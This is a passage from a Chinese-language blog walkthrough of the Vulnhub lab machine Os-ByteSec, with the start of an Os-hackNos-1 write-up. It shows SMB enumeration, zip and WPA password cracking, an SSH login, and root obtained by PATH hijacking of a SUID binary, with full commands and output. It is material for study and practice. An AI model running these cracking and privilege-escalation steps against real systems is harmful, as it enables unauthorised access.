cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用<code>dirsearch</code>进行目录扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">─# dirsearch -u "http://192.168.5.135/"</span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.135/_21-08-29_19-39-13.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-08-29_19-39-13.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.135/</span><br><span class="line"></span><br><span class="line">[19:39:13] Starting: </span><br><span class="line">[19:39:13] 301 - 311B - /js -> http://192.168.5.135/js/</span><br><span class="line">[19:39:13] 301 - 313B - /html -> http://192.168.5.135/html/</span><br><span class="line">[19:39:14] 403 - 278B - /.ht_wsr.txt </span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.bak1</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_extra</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.sample</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.save</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_sc</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessOLD2</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess_orig</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessBAK</span><br><span class="line">[19:39:14] 403 - 278B - /.htm</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccessOLD</span><br><span class="line">[19:39:14] 403 - 278B - /.htaccess.orig</span><br><span class="line">[19:39:14] 403 - 278B - /.htpasswd_test </span><br><span class="line">[19:39:14] 403 - 278B - /.html</span><br><span class="line">[19:39:14] 403 - 278B - /.htpasswds </span><br><span class="line">[19:39:14] 403 - 278B - /.httr-oauth </span><br><span class="line">[19:39:21] 301 - 312B - /css -> http://192.168.5.135/css/ </span><br><span class="line">[19:39:23] 301 - 316B - /gallery -> http://192.168.5.135/gallery/ </span><br><span class="line">[19:39:23] 200 - 738B - /html/ </span><br><span class="line">[19:39:23] 301 - 312B - /img -> http://192.168.5.135/img/ </span><br><span class="line">[19:39:23] 200 - 3KB - /index.html </span><br><span class="line">[19:39:23] 200 - 2KB - /js/ </span><br><span class="line">[19:39:25] 301 - 313B - /news -> http://192.168.5.135/news/ </span><br><span class="line">[19:39:27] 403 - 278B - /server-status </span><br><span class="line">[19:39:27] 403 - 278B - /server-status/</span><br><span class="line"> </span><br><span class="line">Task Completed </span><br></pre></td></tr></table></figure><p>使用nmap测试smb安全</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.5.135</span><br><span class="line"></span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:47 CST</span><br><span class="line">NSE: Loaded 11 scripts for scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 0.00s elapsed</span><br><span class="line">Initiating ARP Ping Scan at 19:47</span><br><span class="line">Scanning 192.168.5.135 [1 port]</span><br><span class="line">Completed ARP Ping Scan at 19:47, 0.09s elapsed (1 total hosts)</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 19:47</span><br><span class="line">Completed Parallel DNS resolution of 1 host. at 19:47, 0.01s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 19:47</span><br><span class="line">Scanning 192.168.5.135 (192.168.5.135) [2 ports]</span><br><span class="line">Discovered open port 445/tcp on 192.168.5.135</span><br><span class="line">Discovered open port 139/tcp on 192.168.5.135</span><br><span class="line">Completed SYN Stealth Scan at 19:47, 0.15s elapsed (2 total ports)</span><br><span class="line">NSE: Script scanning 192.168.5.135.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 5.17s elapsed</span><br><span class="line">Nmap scan report for 192.168.5.135 (192.168.5.135)</span><br><span class="line">Host is up (0.00049s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br><span class="line">MAC Address: 00:0C:29:13:48:B6 (VMware)</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">|_smb-vuln-ms10-061: false</span><br><span class="line">| smb-vuln-regsvc-dos: </span><br><span class="line">| VULNERABLE:</span><br><span class="line">| Service regsvc in Microsoft Windows systems vulnerable to denial of service</span><br><span class="line">| State: VULNERABLE</span><br><span class="line">| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference</span><br><span class="line">| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes</span><br><span class="line">| while working on smb-enum-sessions.</span><br><span class="line">|_ </span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 19:47</span><br><span class="line">Completed NSE at 19:47, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/bin/../share/nmap</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds</span><br><span class="line"> Raw packets sent: 3 (116B) | Rcvd: 3 (116B)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用smbmap进行测试,发现可以匿名访问但无权限</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─# smbmap -H 192.168.5.135 1 ⨯</span><br><span class="line">[+] Guest session IP: 192.168.5.135:445 Name: 192.168.5.135 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> print$ NO ACCESS Printer Drivers</span><br><span class="line"> IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用enum4linux测试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">└─# enum4linux -U 192.168.5.135</span><br><span class="line">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 20:11:41 2021</span><br><span class="line"></span><br><span class="line"> ========================== </span><br><span class="line">| Target Information |</span><br><span class="line"> ========================== </span><br><span class="line">Target ........... 192.168.5.135</span><br><span class="line">RID Range ........ 500-550,1000-1050</span><br><span class="line">Username ......... ''</span><br><span class="line">Password ......... ''</span><br><span class="line">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ===================================================== </span><br><span class="line">| Enumerating Workgroup/Domain on 192.168.5.135 |</span><br><span class="line"> ===================================================== </span><br><span class="line">[+] Got domain/workgroup name: WORKGROUP</span><br><span class="line"></span><br><span class="line"> ====================================== </span><br><span class="line">| Session Check on 192.168.5.135 |</span><br><span class="line"> ====================================== </span><br><span class="line">[+] Server 192.168.5.135 allows sessions using username '', password ''</span><br><span class="line"></span><br><span class="line"> ============================================ </span><br><span class="line">| Getting domain SID for 192.168.5.135 |</span><br><span class="line"> ============================================ </span><br><span class="line">Domain Name: WORKGROUP</span><br><span class="line">Domain Sid: (NULL SID)</span><br><span class="line">[+] Can't determine if host is part of domain or part of a workgroup</span><br><span class="line"></span><br><span class="line"> ============================== </span><br><span class="line">| Users on 192.168.5.135 |</span><br><span class="line"> ============================== </span><br><span class="line">index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: smb Name: Desc: </span><br><span class="line"></span><br><span class="line">user:[smb] rid:[0x3e8]</span><br><span class="line">enum4linux complete on Sun Aug 29 20:11:41 2021</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用默认参数直接跑<code>enum4linux 192.168.5.135</code></p><p><img src="/2023/10/21/Os-ByteSec/image-20230628230305489.png" alt="image-20230628230305489"></p><p>得到sagar、blackjax、smb这三个用户</p><p>经过测试只有smb这个用户的密码在不输入的情况能够读取。即smb用户是空密码。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─# smbmap -u smb -H 192.168.5.135 </span><br><span class="line">[+] IP: 192.168.5.135:445 Name: 192.168.5.135 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> print$ READ ONLY Printer Drivers</span><br><span class="line"> IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用smbclient登录进去,提示输入密码,直接回车</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─# smbclient //192.168.5.135/smb -U smb</span><br><span class="line">Enter WORKGROUP\smb's password: </span><br><span class="line">Try "help" to get a list of possible commands.</span><br><span class="line">smb: \> </span><br></pre></td></tr></table></figure><p>使用ls列出文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">smb: \> ls</span><br><span class="line"> . D 0 Mon Nov 4 19:50:37 2019</span><br><span class="line"> .. D 0 Mon Nov 4 19:37:28 2019</span><br><span class="line"> main.txt N 10 Mon Nov 4 19:45:38 2019</span><br><span class="line"> safe.zip N 3424907 Mon Nov 4 19:50:37 2019</span><br><span class="line"></span><br><span class="line"> 9204224 blocks of size 1024. 6831688 blocks available</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用get下载这两个文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">smb: \> get main.txt </span><br><span class="line">getting file \main.txt of size 10 as main.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)</span><br><span class="line">smb: \> get safe.zip </span><br><span class="line">getting file \safe.zip of size 3424907 as safe.zip (65581.0 KiloBytes/sec) (average 57666.3 KiloBytes/sec)</span><br></pre></td></tr></table></figure><p>查看文件内容</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">└─# cat main.txt </span><br><span class="line">helo</span><br></pre></td></tr></table></figure><p>解压safe.zip时发现有密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">└─# unzip safe.zip </span><br><span class="line">Archive: safe.zip</span><br><span class="line">[safe.zip] secret.jpg password: </span><br><span class="line"> skipping: secret.jpg incorrect password</span><br><span class="line"> skipping: user.cap incorrect password</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用john破解密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">┌──(root💀kali)-[~]</span><br><span class="line">└─# zip2john safe.zip > safepass 82 ⨯</span><br><span class="line">ver 2.0 efh 5455 efh 7875 safe.zip/secret.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=60550, decmplen=62471, crc=6D48091C</span><br><span class="line">ver 2.0 efh 5455 efh 7875 safe.zip/user.cap PKZIP Encr: 2b chk, TS_chk, cmplen=3364011, decmplen=6920971, crc=717BA9D6</span><br><span class="line">NOTE: It is assumed that all files in each archive have the same password.</span><br><span class="line">If that is not the case, the hash may be uncrackable. To avoid this, use</span><br><span class="line">option -o to pick a file at a time.</span><br><span class="line"> </span><br><span class="line">┌──(root💀kali)-[~]</span><br><span class="line">└─# john safepass </span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (PKZIP [32/64])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Proceeding with single, rules:Single</span><br><span class="line">Press 'q' or Ctrl-C to abort, almost any other key for status</span><br><span class="line">Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Almost done: Processing the remaining buffered candidate passwords, if any.</span><br><span class="line">Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.</span><br><span class="line">Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist</span><br><span class="line">hacker1 (safe.zip)</span><br><span class="line">1g 0:00:00:00 DONE 2/3 (2021-08-29 21:06) 20.00g/s 1680Kp/s 1680Kc/s 1680KC/s fireballs..faithfaith</span><br><span class="line">Use the "--show" option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>或者使用<code>fcrackzip</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PASSWORD FOUND!!!!: pw == hacker1</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>得到密码为<code>hacker1</code></p><p>解压后得到secret.jpg和user.cap</p><p>图片上没得到什么有用的信息</p><p>user.cap是一个wifi抓包</p><p>使用<code>aircrack-ng</code>破解密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> Aircrack-ng 1.6 </span><br><span class="line"></span><br><span class="line"> [00:00:00] 2354/10303727 keys tested (9801.73 k/s) </span><br><span class="line"></span><br><span class="line"> Time left: 17 minutes, 30 seconds 0.02%</span><br><span class="line"></span><br><span class="line"> KEY FOUND! [ snowflake ]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> Master Key : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB </span><br><span class="line"> 59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62 </span><br><span class="line"></span><br><span class="line"> Transient Key : 1F 89 42 F4 E2 74 8B 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"></span><br><span class="line"> EAPOL HMAC : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>得到密码<code>snowflake</code></p><p>ssh登录,之前nmap扫描出ssh端口为2525,故加上-p 2525</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─# ssh blackjax@192.168.5.135 -p 2525 </span><br></pre></td></tr></table></figure><p>使用<code>python3 -c 'import pty;pty.spawn("/bin/bash")'</code>切换shell</p><p>得到user.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ cat /home/blackjax/user.txt </span><br><span class="line"> _ _ _____ ______ _____ ______ _ _____ </span><br><span class="line"> | | | |/ ____| ____| __ \ | ____| | /\ / ____|</span><br><span class="line"> | | | | (___ | |__ | |__) |_____| |__ | | / \ | | __ </span><br><span class="line"> | | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |</span><br><span class="line"> | |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |</span><br><span class="line"> \____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Go To Root.</span><br><span class="line"></span><br><span class="line">MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>尝试sudo提权,失败后查找具有root权限的命令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ sudo su root</span><br><span class="line">[sudo] password for blackjax: </span><br><span class="line">blackjax is not in the sudoers file. This incident will be reported.</span><br><span class="line">blackjax@nitin:~$ find / -perm -u=s -type f 2>/dev/null</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br><span class="line">/usr/lib/policykit-1/polkit-agent-helper-1</span><br><span class="line">/usr/lib/snapd/snap-confine</span><br><span class="line">/usr/lib/i386-linux-gnu/lxc/lxc-user-nic</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br><span class="line">/usr/bin/newgidmap</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/newuidmap</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/at</span><br><span class="line">/usr/bin/pkexec</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/bin/netscan</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/bin/ping6</span><br><span class="line">/bin/fusermount</span><br><span class="line">/bin/mount</span><br><span class="line">/bin/su</span><br><span class="line">/bin/ping</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/ntfs-3g</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用netscan,发现与netstat -natp差不多</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ netscan</span><br><span class="line">Active Internet connections (servers and established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name</span><br><span class="line">tcp 0 0 0.0.0.0:2525 0.0.0.0:* LISTEN 1153/sshd </span><br><span class="line">tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 1010/smbd </span><br><span class="line">tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1181/mysqld </span><br><span class="line">tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 1010/smbd </span><br><span class="line">tcp 0 0 192.168.5.135:2525 192.168.5.129:54132 ESTABLISHED 3415/sshd: blackjax</span><br><span class="line">tcp6 0 0 :::2525 :::* LISTEN 1153/sshd </span><br><span class="line">tcp6 0 0 :::445 :::* LISTEN 1010/smbd </span><br><span class="line">tcp6 0 0 :::139 :::* LISTEN 1010/smbd </span><br><span class="line">tcp6 0 0 :::80 :::* LISTEN 1264/apache2 </span><br></pre></td></tr></table></figure><p>使用<code>xxd /usr/bin/netscan</code>查看二进制文件,发现确实调用了netstat -natp。</p><p><img src="/2023/10/21/Os-ByteSec/image-20230628230353627.png" alt="image-20230628230353627"></p><p>那么尝试用这个命令进行提权,注意这里写入的文件是netstat而不是netscan</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ cd /tmp</span><br><span class="line">blackjax@nitin:/tmp$ echo "/bin/bash" >netstat</span><br><span class="line">blackjax@nitin:/tmp$ chmod 775 netstat</span><br><span class="line">blackjax@nitin:/tmp$ export PATH=/tmp:$PATH</span><br><span class="line">blackjax@nitin:/tmp$ netscan</span><br><span class="line">root@nitin:/tmp# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1001(blackjax)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>获得最后的root.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">root@nitin:/tmp# cat /root/root.txt </span><br><span class="line"> ____ ____ ____ ______ ________ ___ ______</span><br><span class="line"> / __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/</span><br><span class="line"> / /_/ / / / / / / / / / / /_ / / / /| |/ / __ </span><br><span class="line"> / _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ / </span><br><span class="line">/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/ </span><br><span class="line"> /_____/ </span><br><span class="line">Conguratulation..</span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author : Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">Contact : https://www.linkedin.com/in/rahulgehlaut/</span><br><span class="line"></span><br><span class="line">WebSite : jameshacker.me</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>提权所用的命令是netcan,netscan调用的命令是netstat,所以用netstat来劫持环境变量。</p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> 渗透测试 </tag>
<tag> 提权 </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>Os-hackNos-1</title>
<link href="/2023/10/21/Os-hackNos-1/"/>
<url>/2023/10/21/Os-hackNos-1/</url>
<content type="html"><![CDATA[<h1 id="Os-hackNos-1"><a href="#Os-hackNos-1" class="headerlink" title="Os-hackNos-1"></a>Os-hackNos-1</h1><p>靶机下载 <a href="https://www.vulnhub.com/entry/hacknos-os-hacknos,401">https://www.vulnhub.com/entry/hacknos-os-hacknos,401</a></p><p>目标为 普通用户的<strong>user.txt</strong>和root用户的<strong>root.txt</strong></p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="靶机配置"></a>靶机配置</h2><p>在将靶机文件下载下来为Os-hackNos-1.ova</p><p>使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231828025.png" alt="image-20230628231828025"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">向下翻动,将ro改为rw single init=/bin/bash</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231856200.png" alt="image-20230628231856200"></p><p>然后按下 ctrl+x进入shell</p><p>使用ip a查看ip地址</p><p>若发现无ip地址,则记住网卡名称,这里是ens33</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231909760.png" alt="image-20230628231909760"></p><p>使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/network/interfaces</span><br></pre></td></tr></table></figure><p>对网卡信息进行编辑</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231926804.png" alt="image-20230628231926804"></p><p>如果在使用vim /etc/network/interfaces没有如上信息,则需要重新导入ova,即删掉此虚拟机,重新使用vm打开ova并导入。</p><p>使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 